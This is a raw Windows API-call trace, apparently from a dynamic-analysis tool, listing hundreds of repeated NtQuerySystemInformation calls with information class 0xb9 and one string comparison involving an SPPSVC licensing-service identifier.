[0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x28, ResultLength=0x0) [0229.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0229.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0229.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0229.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.128] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0230.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0230.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0230.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0230.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0230.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0230.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0230.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0230.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce30, Length=0x20, ResultLength=0x0) [0230.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce30, Length=0x20, ResultLength=0x0) [0230.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce30, Length=0x20, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0230.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd498, Length=0x50, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0230.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0230.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0230.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0230.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0230.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x28, ResultLength=0x0) [0230.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0230.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x28, ResultLength=0x0) [0230.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x28, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x20, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x20, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x50, ResultLength=0x0) [0230.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0230.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x28, ResultLength=0x0) [0230.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0230.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0230.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0230.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0230.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x20, ResultLength=0x0) [0230.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x20, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0230.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.151] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd328, Length=0x50, ResultLength=0x0) [0230.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.151] 